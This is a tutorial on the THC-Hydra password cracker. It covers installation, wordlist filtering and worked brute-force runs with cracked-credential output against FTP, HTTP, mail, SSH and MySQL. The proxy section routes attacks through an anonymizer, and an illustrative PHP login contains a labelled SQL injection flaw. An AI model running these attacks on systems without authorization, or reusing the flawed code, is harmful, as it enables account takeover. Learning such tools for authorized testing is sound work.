################################################################################
[0x01] Compiling THC-HYDRA on Linux:
################################################################################
Download the source, unpack it and enter the directory it creates:
-------------------------------------------------------------------------------
$ wget http://www.thc.org/releases/hydra-7.1-src.tar.gz
$ tar -vzxf hydra-7.1-src.tar.gz
$ cd hydra-7.1-src/
-------------------------------------------------------------------------------
Optional configure flags:
--disable-xhydra      do not build xhydra (the hydra GUI)
--prefix=/opt/hydra   where hydra will be installed.
-------------------------------------------------------------------------------
$ ./configure --disable-xhydra --prefix=/opt/hydra
-------------------------------------------------------------------------------
Compile, install and create a symbolic link (make install writes under /opt, so
it runs as root, hence the # prompt):
-------------------------------------------------------------------------------
# make && make install && ln -s /opt/hydra/hydra /usr/bin
-------------------------------------------------------------------------------
Check where make install actually put the binary (ls /opt/hydra /opt/hydra/bin)
and point the link at that path. If you want to use pw-inspector, create a
symbolic link for it too:
-------------------------------------------------------------------------------
# ln -s /opt/hydra/pw-inspector /usr/bin
--------------------------------------------------------------------------------
================================================================================
Supplementary libraries for THC-HYDRA on Linux:
================================================================================
To use modules such as ssh or mysql you need to install additional libraries.
For the mysql module you can install straight from the repositories of any
Debian-like distribution.
-------------------------------------------------------------------------------
# apt-get install libmysqlclient-dev
-------------------------------------------------------------------------------
For the ssh module, these are the steps I used on Debian 6. (If apt-get reports
that "openssl" or "zlib" are not the packages you need, the development packages
that libssh builds against are named libssl-dev and zlib1g-dev.)
-------------------------------------------------------------------------------
# apt-get install cmake openssl zlib build-essential
$ wget http://www.libssh.org/files/0.4/libssh-0.4.0.tar.gz
$ tar -vzxf libssh-0.4.0.tar.gz && cd libssh-0.4.0
$ mkdir build && cd build
$ cmake -DWITH_SSH1=ON -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=/usr ..
# make && make install
-------------------------------------------------------------------------------
Then just compile hydra again. Read the output of ./configure: if it does not
report libssh as found, the ssh module is left out without any error at build
time and hydra will later refuse the "ssh" service.
-------------------------------------------------------------------------------
$ wget http://www.thc.org/releases/hydra-7.1-src.tar.gz
$ tar -vzxf hydra-7.1-src.tar.gz
$ cd hydra-7.1-src/
$ ./configure --disable-xhydra --prefix=/opt/hydra
# make && make install
--------------------------------------------------------------------------------
================================================================================
PW-Inspector :
================================================================================
PW-Inspector is a utility shipped with the Hydra package whose only job is to
filter wordlists according to the parameters passed to it.
Options of 'pw-inspector':
********************************************************************************
Options:
  -i FILE      file to read passwords from (default: stdin)
  -o FILE      file to write valid passwords to (default: stdout)
  -m MINLEN    minimum length of a valid password
  -M MAXLEN    maximum length of a valid password
  -c MINSETS   the minimum number of sets required (default: all given)
Sets:
  -l           lowcase characters (a,b,c,d, etc.)
  -u           upcase characters (A,B,C,D, etc.)
  -n           numbers (1,2,3,4, etc.)
  -p           printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)
  -s           special characters - all others not withint the sets above
********************************************************************************
The options explained:
-i FILE     file to read passwords from (default: stdin)
-o FILE     file to write the accepted passwords to (default: stdout)
-m MINLEN   minimum length of an accepted password
-M MAXLEN   maximum length of an accepted password
-c MINSETS  how many of the requested sets a password must contain (default: all of the sets given)
Sets:
-l Lowercase characters (a,b,c,d, etc.)
-u Uppercase characters (A,B,C,D, etc.)
-n Numbers (1,2,3,4, etc.)
-p Printable characters that do not fit -l/-u/-n, i.e. $,!,/,(,*, etc.
-s Special characters - everything that does not fit any of the sets above.
Examples:
Create a "dirty" wordlist for testing (100000 random strings of 0 to 9 letters
and digits; note that it contains no special characters):
-------------------------------------------------------------------------------
$ perl -le 'print map { ("a".."z", "A".."Z", 0..9)[rand 62] } 1..rand 10 for 1..100000' >> wordlist_suja.txt
-------------------------------------------------------------------------------
Using pw-inspector to filter the "dirty" wordlist and write to a new file only
the passwords whose length is >= 6 and <= 8:
-------------------------------------------------------------------------------
$ pw-inspector -i wordlist_suja.txt -o wordlist_limpa.txt -m 6 -M 8
-------------------------------------------------------------------------------
Redirecting standard output (stdout) to sort for sorting:
-------------------------------------------------------------------------------
$ pw-inspector -i wordlist_suja.txt -m 6 -M 8 | sort >> wordlist_limpa_sort.txt
-------------------------------------------------------------------------------
Feeding sorted content to standard input (stdin):
-------------------------------------------------------------------------------
$ sort wordlist_suja.txt | pw-inspector -m 6 -M 8 >> wordlist_limpa_sort.txt
-------------------------------------------------------------------------------
In the next case nothing will be matched if wordlist_suja.txt was created with
the script given in this tutorial, because pw-inspector is forced to accept only
passwords that contain both of the two requested sets (numbers and special
characters, and special characters definitely do not exist in that wordlist):
-------------------------------------------------------------------------------
$ sort wordlist_suja.txt | pw-inspector -m 4 -M 4 -c 2 -n -s
-------------------------------------------------------------------------------
If the minimum number of sets (-c) were set to 1, it would match every 4-character
password containing at least one of the two sets, i.e. the -n set (numbers).
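To make the set logic and the -c rule concrete, here is a small reimplementation of pw-inspector's filter in Python. It is an added example written for this tutorial, not pw-inspector's own code, and it approximates the tool's classes (-l, -u, -n, -p, -s) with Python's string constants; the SAMPLE wordlist is constructed to show the two cases from the examples above, including the point that whitespace counts as a "special" character.

```python
import string

# Character classes corresponding to pw-inspector's -l/-u/-n/-p sets; -s is
# everything left over. Reimplementation written for this tutorial (an
# approximation of the tool's behaviour), not pw-inspector's own source.
SETS = {
    "l": frozenset(string.ascii_lowercase),
    "u": frozenset(string.ascii_uppercase),
    "n": frozenset(string.digits),
    "p": frozenset(string.punctuation),  # printable but not a letter or digit
}


def classify(password):
    """Return the set of class letters (l, u, n, p, s) present in password."""
    found = set()
    for ch in password:
        for name, chars in SETS.items():
            if ch in chars:
                found.add(name)
                break
        else:
            found.add("s")  # whitespace, control or non-ASCII characters
    return found


def inspect(words, minlen=0, maxlen=None, sets="", minsets=None):
    """Yield the words that pass the same checks as pw-inspector.

    minlen/maxlen mirror -m/-M, sets is a string of class letters such as
    "ns" for "-n -s", and minsets mirrors -c: how many of the requested
    classes a word must contain (default: all of them).
    """
    required = set(sets)
    if minsets is None:
        minsets = len(required)
    for word in words:
        word = word.rstrip("\r\n")
        if len(word) < minlen or (maxlen is not None and len(word) > maxlen):
            continue
        if required and len(classify(word) & required) < minsets:
            continue
        yield word


# Constructed sample wordlist standing in for wordlist_suja.txt.
SAMPLE = ["abc123", "ab", "abcdefghij", "ABCDEF", "a!b1", "ab12", "abcd", "x y1"]


def demo():
    """Run the tutorial's filters over SAMPLE and return the three results."""
    by_length = list(inspect(SAMPLE, minlen=6, maxlen=8))        # -m 6 -M 8
    both_sets = list(inspect(SAMPLE, 4, 4, sets="ns"))           # -m 4 -M 4 -c 2 -n -s
    any_set = list(inspect(SAMPLE, 4, 4, sets="ns", minsets=1))  # same with -c 1
    return by_length, both_sets, any_set


if __name__ == "__main__":
    import sys
    print(demo())
    # Acts like "pw-inspector -m 6 -M 8" on stdin: sort wordlist | python3 this.py
    for pw in inspect(sys.stdin, minlen=6, maxlen=8):
        print(pw)
```

Only "x y1" survives the -c 2 -n -s filter, because its space is neither a letter, a digit nor punctuation and therefore lands in the -s set; "a!b1" does not, since "!" is printable and belongs to -p. With -c 1 every 4-character word containing a digit is accepted.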
================================================================================
Processing wordlists without PW-Inspector.
================================================================================
Personally I prefer to process wordlists without pw-inspector, since it does not
cover my needs.
The examples below use simple commands that any Linux user should know.
Joining wordlists:
-------------------------------------------------------------------------------
$ cat wordlist_1.txt wordlist_2.txt wordlist_3.txt >> wordlist_final.txt
-------------------------------------------------------------------------------
Sorting and removing duplicate passwords. Note that 'uniq -u' is the wrong tool
here: it prints only the lines that occur exactly once, so every password that
had a duplicate disappears entirely. 'sort -u' keeps one copy of each:
-------------------------------------------------------------------------------
$ sort -u wordlist_suja.txt
-------------------------------------------------------------------------------
Picking passwords of length 6 to 8 containing only digits:
-------------------------------------------------------------------------------
$ sort wordlist_suja.txt | grep -P "^[0-9]{6,8}$"
-------------------------------------------------------------------------------
Picking [a-z0-9] passwords of exactly 6 characters:
-------------------------------------------------------------------------------
$ sort wordlist_suja.txt | grep -P "^[a-z0-9]{6}$"
-------------------------------------------------------------------------------
Picking [a-zA-Z] passwords of any length, removing duplicates and writing the
result to a new file called "wordlist_mdh3ll.txt" (+ rather than * in the
pattern, so that empty lines are not matched):
-------------------------------------------------------------------------------
$ sort -u wordlist_suja.txt | grep -P "^[a-zA-Z]+$" >> wordlist_mdh3ll.txt
or
$ sort -u wordlist_suja.txt | grep -Pi "^[a-z]+$" >> wordlist_mdh3ll.txt
-------------------------------------------------------------------------------
Picking passwords that start with "1" and end with "w":
-------------------------------------------------------------------------------
$ grep -P "^1.*w$" wordlist_suja.txt
-------------------------------------------------------------------------------
Converting uppercase characters to lowercase:
-------------------------------------------------------------------------------
$ tr '[:upper:]' '[:lower:]' < wordlist_suja.txt >> wordlist_minusculo.txt
or
$ perl -ne 'print lc $_' wordlist_suja.txt
-------------------------------------------------------------------------------
================================================================================
Running Hydra:
================================================================================
Run 'hydra' in the terminal without arguments:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE]
  [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT]
  [-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]]|[service://server[:PORT][/OPT]]
Options:
  -R                   restore a previous aborted/crashed session
  -S                   perform an SSL connect
  -s PORT              if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET   password bruteforce generation, type "-x -h" to get help
  -e ns                additional checks, "n" for null password, "s" try login as pass
  -u                   loop around users, not passwords (implied when using -x)
  -C FILE              colon separated "login:pass" format, instead of -L/-P options
  -M FILE              server list for parallel attacks, one entry per line
  -o FILE              write found login/password pairs to FILE instead of stdout
  -f                   exit after the first found login/password pair (per host if -M)
  -t TASKS             run TASKS number of connects in parallel (default: 16)
  -w / -W TIME         waittime for responses (32s) / between connects per thread
  -4 / -6              prefer IPv4 (default) or IPv6 addresses
  -v / -V              verbose mode / show login+pass combination for each attempt
  -U                   service module usage details
  server               the target server (use either this OR the -M option)
  service              the service to crack. Supported protocols: cisco cisco-enable cvs ftp[s] http[s]-{head|get} http[s]-{get|post}-form http-proxy
  OPT                  some service modules need special input (use -U to see module help)
  ... ...
********************************************************************************
As shown above, when run with no arguments it prints its syntax, options, etc.
################################################################################
[0x02] Hydra options:
################################################################################
-R           restore a previous aborted/crashed session
-S           perform an SSL connect
-s PORT      define the port if the service is not on its default one
-l LOGIN     log in with the single login name LOGIN
-L FILE      load several logins from FILE
-p PASS      try the single password PASS
-P FILE      load several passwords from FILE
-x MIN:MAX:CHARSET   generate the passwords instead of reading them from a file:
             every combination of CHARSET with length MIN to MAX. In CHARSET,
             "a" stands for all lowercase letters, "A" for all uppercase letters
             and "1" for all digits; for any other character, use the character
             itself. -x implies -u (loop over users for each password), and the
             number of candidates grows as |CHARSET|^length, so keep the range
             small.
Examples:
-x 3:5:a       generates passwords of length [3-5] from the lowercase letters
-x 5:8:A       generates passwords of length [5-8] from the uppercase letters
-x 5:8:A1      generates passwords of length [5-8] from uppercase letters and digits
-x 1:3:/       generates passwords of length [1-3] from the single character "/"
-x 1:3:/%,.-   generates passwords of length [1-3] from the characters / % , . -
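The following Python script, added here as an example and not taken from hydra's source, expands the -x shorthand exactly as described above and computes how many candidates each specification produces. It reproduces the "1000000 login tries" that hydra prints for -x 6:6:1 in the SSH example later in this tutorial; the order in which candidates are generated (shortest first, alphabet order) is this example's choice and is not a statement about hydra's internal order.

```python
import itertools
import string

# Legend of hydra's -x CHARSET shorthand: a = lowercase, A = uppercase,
# 1 = digits, anything else stands for itself. Added example, not hydra code.
SHORTHAND = {
    "a": string.ascii_lowercase,
    "A": string.ascii_uppercase,
    "1": string.digits,
}


def expand_charset(spec):
    """Expand a -x charset spec into the real alphabet, without duplicates."""
    alphabet = []
    for c in spec:
        for ch in SHORTHAND.get(c, c):
            if ch not in alphabet:
                alphabet.append(ch)
    return "".join(alphabet)


def parse_x(arg):
    """Parse "MIN:MAX:CHARSET" and return (min_len, max_len, alphabet)."""
    min_s, max_s, spec = arg.split(":", 2)
    min_len, max_len = int(min_s), int(max_s)
    if min_len < 1 or max_len < min_len:
        raise ValueError("need 1 <= MIN <= MAX in %r" % arg)
    alphabet = expand_charset(spec)
    if not alphabet:
        raise ValueError("empty charset in %r" % arg)
    return min_len, max_len, alphabet


def count_candidates(arg):
    """Number of passwords -x would try: sum of |alphabet|^L over each length."""
    min_len, max_len, alphabet = parse_x(arg)
    n = len(alphabet)
    return sum(n ** length for length in range(min_len, max_len + 1))


def generate(arg):
    """Lazily yield every candidate, shortest first, in alphabet order."""
    min_len, max_len, alphabet = parse_x(arg)
    for length in range(min_len, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            yield "".join(combo)


def position_of(arg, password):
    """1-based index at which this generator reaches password (None if never)."""
    for i, candidate in enumerate(generate(arg), start=1):
        if candidate == password:
            return i
    return None


if __name__ == "__main__":
    for spec in ("3:5:a", "5:8:A", "5:8:A1", "1:3:/", "1:3:/%,.-", "6:6:1"):
        print("-x %-10s alphabet=%-3d candidates=%d"
              % (spec, len(parse_x(spec)[2]), count_candidates(spec)))
    # The SSH example's password 000138 is the 139th candidate of -x 6:6:1.
    print(position_of("6:6:1", "000138"))
```

Running count_candidates before launching hydra tells you whether a -x range is realistic: 5:8:A1 already means over 2.9 trillion candidates, while 6:6:1 is a million, which the SSH example later gets through in under a minute only because the password happened to be near the start.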
################################################################################
[0x03] Examples:
################################################################################
Practice with the options from [0x02] of this tutorial.
================================================================================
FTP example
================================================================================
Syntax:
-------------------------------------------------------------------------------
hydra -l root -P pass.txt -w 15 localhost ftp
-------------------------------------------------------------------------------
Connecting by hand first, to confirm that an FTP server is answering (terminal
screenshot):
mdh3ll@debian:~$ ftp
ftp> o
(to) localhost
Connected to localhost.
220 ProFTPD 1.3.3d Server (ProFTPD) [::ffff:127.0.0.1]
Name (localhost:mdh3ll):
Output:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-11 12:25:52
[DATA] 16 tasks, 1 server, 46 login tries (l:1/p:46), ~2 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 127.0.0.1   login: nobody   password: culture123
[STATUS] attack finished for localhost (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-11 12:25:53
********************************************************************************
Found:
[21][ftp] host: 127.0.0.1   login: nobody   password: culture123
================================================================================
http-head example
================================================================================
Syntax:
-------------------------------------------------------------------------------
hydra -L users.txt -P pass.txt -o out.txt localhost http-head /colt/
-------------------------------------------------------------------------------
Firefox screenshot of http://localhost/colt/: an "Authentication required"
dialog reading "The server localhost:80 requires a username and password. The
server says: colt user", with username and password fields and cancel/login
buttons. The directory is protected by HTTP authentication (realm "colt user"),
which is what the http-head module attacks; the path after the service name is
the protected URL.
Output:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-11 12:19:16
[DATA] 16 tasks, 1 server, 46 login tries (l:1/p:46), ~2 tries per task
[DATA] attacking service http-head on port 80
[80][www] host: 127.0.0.1   login: lampp   password: culture123
[STATUS] attack finished for localhost (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-11 12:19:16
********************************************************************************
Hydra found the pair and saved it to out.txt (-o):
-------------------------------------------------------------------------------
user: lampp   password: culture123
--------------------------------------------------------------------------------
================================================================================
http-post-form example
================================================================================
Module argument syntax: <url>:<form parameters>:<condition string>[:<optional>[:<optional>]]
The form at http://127.0.0.1/login/index.html:
-------------------------------------------------------------------------------
<html>
<head><title>Login</title></head>
<body>
<!-- illustrative login form: the field names "user" and "pass" are what goes
     into hydra's <form parameters> field, with ^USER^ and ^PASS^ as values -->
<form method="POST" action="logar.php">
<p> Nome </p><br>
<input type="text" name="user"><br>
<p> Senha </p><br>
<input type="password" name="pass"><br>
<input type="submit" name="enviar" value="Enviar">
</form>
</body>
</html>
--------------------------------------------------------------------------------
Firefox screenshot of http://127.0.0.1/login/index.html: the login form with the
fields "Nome" and "Senha" and an "Enviar" button.
Illustrative logar.php:
-------------------------------------------------------------------------------
<?php
# illustrative logar.php: a hard-coded credential check, no session, no database
$user = $_POST['user'];
$pass = $_POST['pass'];
if($user == "admin" && $pass == "culture123"){
    echo "Logado com sucesso!";          # success page
}else{
    echo "Usuario ou senha invalida!";   # failure page: the text to put in hydra's condition string
}
?>
--------------------------------------------------------------------------------
Output:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-11 12:51:14
[DATA] 1 task, 1 server, 47 login tries (l:1/p:47), ~47 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1   login: admin   password: culture123
[STATUS] attack finished for 127.0.0.1 (valid pair found)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-11 12:51:14
********************************************************************************
The condition string is the text the server returns on a failed login; hydra
reports a pair as valid when that text is absent from the response, so a
condition string that also appears on the success page, or one that never
appears at all, produces false positives. Check the failure page by hand first.
For more details run: ./hydra -U http-post-form
================================================================================
http-get-form example
================================================================================
http-get-form follows the same model as http-post-form.
-------------------------------------------------------------------------------
# illustrative index.html (http://127.0.0.1/index.html)
<html>
<head><title>Login</title></head>
<body>
<!-- illustrative form sent with GET: note the field names tx_nome / tx_senha -->
<form method="GET" action="enviar.php">
<p> Nome </p><br>
<input type="text" name="tx_nome"><br>
<p> Senha </p><br>
<input type="password" name="tx_senha"><br>
<input type="submit" name="go" value="Go">
</form>
</body>
</html>
--------------------------------------------------------------------------------
-------------------------------------------------------------------------------
# illustrative enviar.php (http://127.0.0.1/enviar.php)
<?php
# illustrative enviar.php
require_once('conectar.php');   # opens the MySQL connection (not shown)
$user = $_GET['tx_nome'];
$pass = $_GET['tx_senha'];
$pass = md5($pass);
# Illustrative only: $user is interpolated straight into the query (SQL
# injection) and the mysql_* functions have been removed from PHP 7; a real
# application would use prepared statements and a proper password hash.
$pesquisa = mysql_query("select usuario,senha from TBLogin where usuario = \"$user\" AND senha = \"$pass\"");
$resultado = mysql_num_rows($pesquisa);
if($resultado == 1){
    echo "Logado com sucesso";
}else{
    echo "Algo esta errado";    # failure string used in hydra's condition field
}
?>
-------------------------------------------------------------------------------
The complete syntax then looks like this:
-------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f 127.0.0.1 http-get-form "/enviar.php:tx_nome=^USER^&tx_senha=^PASS^:Algo esta errado"
-------------------------------------------------------------------------------
The form parameters must use the field names of the form actually being
attacked (here tx_nome and tx_senha, as read by enviar.php; a template with
user=^USER^&pass=^PASS^ would never log in against this script), and the
condition string is the text the server returns on a failed login. Apart from
that, the only significant change from the previous example is swapping the
"http-post-form" module for "http-get-form".
For more details run: ./hydra -U http-get-form
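To show what the http-post-form and http-get-form modules actually do with the "<url>:<form parameters>:<condition string>" argument, here is a small Python model of the attack loop, added as an example and not taken from hydra. Assumptions: stub_server is a constructed in-process stand-in for the two illustrative PHP scripts above (no network is used), PASS_TXT is a constructed pass.txt, the module argument for the POST case is derived from logar.php's field names and failure string, values are URL-encoded before substitution (this example's choice), and the S=/F= prefixes follow hydra's module help for the http-form modules (confirm with hydra -U http-post-form on your version).

```python
from urllib.parse import parse_qs, quote_plus

# Stand-in for the web server: returns the body the tutorial's illustrative
# logar.php (POST) and enviar.php (GET) would produce. Constructed for this
# example; no real HTTP request is made.
VALID = {"admin": "culture123"}


def stub_server(method, path, params):
    if method == "POST" and path == "/login/logar.php":
        user, pw = params.get("user", ""), params.get("pass", "")
        return "Logado com sucesso!" if VALID.get(user) == pw else "Usuario ou senha invalida!"
    if method == "GET" and path == "/enviar.php":
        user, pw = params.get("tx_nome", ""), params.get("tx_senha", "")
        return "Logado com sucesso" if VALID.get(user) == pw else "Algo esta errado"
    return "404 Not Found"


def parse_module_arg(arg):
    """Split hydra's "<path>:<form parameters>:<condition string>".

    Returns (path, template, condition, success_mode). A condition prefixed
    with S= names a success string; F= (the default) names a failure string.
    """
    path, template, cond = arg.split(":", 2)
    success_mode = cond.startswith("S=")
    if cond[:2] in ("S=", "F="):
        cond = cond[2:]
    return path, template, cond, success_mode


def build_params(template, user, password):
    """Substitute ^USER^/^PASS^ and parse the result as form data.

    Values are URL-encoded here so that a password containing & or = stays a
    single value (this example's choice, not a statement about hydra).
    """
    body = template.replace("^USER^", quote_plus(user)).replace("^PASS^", quote_plus(password))
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def form_bruteforce(method, module_arg, logins, passwords, send=stub_server, stop_first=True):
    """Try every login/password pair the way the http-*-form modules do.

    Failure mode: a pair is valid when the condition string is absent from
    the response. Success mode (S=): valid when it is present.
    stop_first mirrors -f (stop at the first valid pair).
    """
    path, template, cond, success_mode = parse_module_arg(module_arg)
    found = []
    for user in logins:
        for password in passwords:
            body = send(method, path, build_params(template, user, password))
            valid = (cond in body) if success_mode else (cond not in body)
            if valid:
                found.append((user, password))
                if stop_first:
                    return found
    return found


PASS_TXT = ["123456", "love1234", "culture123", "Password01"]  # constructed pass.txt

if __name__ == "__main__":
    print(form_bruteforce("POST", "/login/logar.php:user=^USER^&pass=^PASS^:Usuario ou senha invalida", ["admin"], PASS_TXT))
    print(form_bruteforce("GET", "/enviar.php:tx_nome=^USER^&tx_senha=^PASS^:Algo esta errado", ["admin"], PASS_TXT))
    # A wrong condition string (the success text without S=) reports the very
    # first attempt as valid: a false positive, not a cracked password.
    print(form_bruteforce("POST", "/login/logar.php:user=^USER^&pass=^PASS^:Logado", ["admin"], PASS_TXT))
```

The third call is the mistake to watch for: with "Logado" as a failure string, the first wrong password already yields a response that does not contain it, so the loop stops and reports admin:123456. Writing the same text as "S=Logado" turns it into a success check and the correct pair is found instead.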
================================================================================
POP3 example
================================================================================
Syntax:
-------------------------------------------------------------------------------
hydra -L users.txt -p 123456 -S pop3.dominio.com pop3
-------------------------------------------------------------------------------
Output (this run was done with an older hydra, 5.4):
********************************************************************************
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-28 00:55:28
[DATA] 9 tasks, 1 servers, 9 login tries (l:9/p:1), ~1 tries per task
[DATA] attacking service pop3 on port 110
[STATUS] attack finished for pop3.xxx.com (waiting for childs to finish)
[110][pop3] host: pop3.dominio.com   login: user@dominio.com.br   password: 123456
********************************************************************************
================================================================================
SMTP example
================================================================================
Syntax:
-------------------------------------------------------------------------------
hydra -l admin@dominio.com -P pass.txt smtp.mail.dominio.com smtp
-------------------------------------------------------------------------------
Output:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-11 15:06:54
[DATA] 4 tasks, 1 server, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking service smtp on port 25
[25][smtp] host: xxx.xxx.xxx.xxx   login: admin@dominio.com   password: cabal12ea13
********************************************************************************
================================================================================
IMAP example
================================================================================
Syntax (-S selects SSL, so hydra uses the IMAPS port 993):
-------------------------------------------------------------------------------
hydra -l nobody@dominio.com -P pass.txt -S imap.dominio.com imap
-------------------------------------------------------------------------------
Output:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-11 20:46:33
[DATA] 5 tasks, 1 server, 5 login tries (l:1/p:5), ~1 try per task
[DATA] attacking service imap on port 993
[993][imap] host: xx.xxx.xx.xxx   login: nobody@dominio.com   password: love1234
[STATUS] attack finished for imap.dominio.com (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-10-11 20:46:37
********************************************************************************
================================================================================
SSH example
================================================================================
Connecting by hand first, to confirm the server answers and accepts password
authentication (terminal screenshot):
mdh3ll@debian:~$ ssh teste@192.168.1.4
The authenticity of host '192.168.1.4 (192.168.1.4)' can't be established.
RSA key fingerprint is xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.4' (RSA) to the list of known hosts.
teste@192.168.1.4's password:
Syntax (-x 6:6:1 generates every 6-digit numeric password, 10^6 = 1000000
candidates, which is what the [DATA] line below reports; -x implies -u):
-------------------------------------------------------------------------------
hydra -l teste -x 6:6:1 -s 22 192.168.1.4 ssh
-------------------------------------------------------------------------------
Output:
********************************************************************************
Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-13 16:44:47
[DATA] 16 tasks, 1 server, 1000000 login tries (l:1/p:1000000), ~62500 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.4   login: teste   password: 000138
[STATUS] attack finished for 192.168.1.4 (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-10-13 16:45:26
********************************************************************************
The run finished in under a minute only because 000138 is near the start of
the sequence. Many sshd configurations limit the number of concurrent
unauthenticated connections (MaxStartups in sshd_config), so if you see
connection errors with the default 16 tasks, lower them with -t 4.
================================================================================
MySQL example
================================================================================
Syntax:
-------------------------------------------------------------------------------
hydra -l root -P pass.txt -t 4 127.0.0.1 mysql
-------------------------------------------------------------------------------
Output:
********************************************************************************
Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-14 19:09:23
[DATA] 4 tasks, 1 servers, 32 login tries (l:1/p:32), ~8 tries per task
[DATA] attacking service mysql on port 3306
[3306][mysql] host: 127.0.0.1   login: root   password: Password01
[STATUS] attack finished for 127.0.0.1 (waiting for childs to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-10-14 19:09:32
********************************************************************************
################################################################################
[0x04] Proxy:
################################################################################
Web proxy:
Using a proxy with hydra comes down to defining an environment variable whose
name matches what you want to proxy. The variable must be exported so that the
hydra process inherits it: a plain VAR=value assignment only sets a shell
variable that child processes never see.
HTTP proxy (used by the http modules):
-------------------------------------------------------------------------------
$ export HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
-------------------------------------------------------------------------------
For any other service use HYDRA_PROXY_CONNECT:
-------------------------------------------------------------------------------
$ export HYDRA_PROXY_CONNECT=proxy.anonymizer.com:8000
-------------------------------------------------------------------------------
With authentication:
-------------------------------------------------------------------------------
$ export HYDRA_PROXY_AUTH="nome:senha"
-------------------------------------------------------------------------------
To check that a proxy variable is set, use echo $VARIABLE in the terminal (note
the $; without it echo just prints the variable's name):
-------------------------------------------------------------------------------
$ echo $HYDRA_PROXY_HTTP
$ echo $HYDRA_PROXY_CONNECT
$ echo $HYDRA_PROXY_AUTH
-------------------------------------------------------------------------------
The output should be the value you assigned to the variable.
(Please keep the author's credits)